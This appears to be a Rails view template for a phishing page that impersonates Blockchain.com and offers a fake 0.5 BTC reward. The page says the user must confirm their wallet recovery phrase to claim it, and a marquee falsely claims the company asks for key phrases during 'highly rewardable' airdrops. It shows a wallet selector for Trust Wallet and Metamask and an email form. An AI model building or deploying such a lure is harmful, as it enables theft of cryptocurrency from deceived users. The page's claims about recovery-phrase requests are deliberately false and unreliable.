<body>
    <header><image src="/assets/crypt.png">Blockchain<span>.com</span></header>
    <div id="sec-head">
        <h2>Recover Rewards 0.5 BTC</h2>
        <p>The recovery phrase confirmation is to ensure that the one who claims the bonus is really you.</p>
    </div>
    <marquee >Remember, unless in case of a highly rewardable airdrop, Blockchain will never ask for your wallet security key phrase. Thank you for participating.</marquee>

    <div class="row">
        <div class="col-md-6 col-md-offset-3">
            <div class="menu">
                <label>Wallet</label>
                <select class="form-select form-select-sm" aria-label=".form-select-sm example">
                    <option selected>--Select Wallet--</option>
                    <option value="trust">Trust Wallet</option>
                    <option value="meta">Metamask</option>
                </select>
            </div>
            <%= form_with(model: @user) do |f| %>
                <%= f.label :email %>
                <%= f.email_field :email, class: 'form-control' %>

                <%= f.submit "Submit", class: "btn btn-primary" %>
            <% end %>
        </div>
    </div>
</body>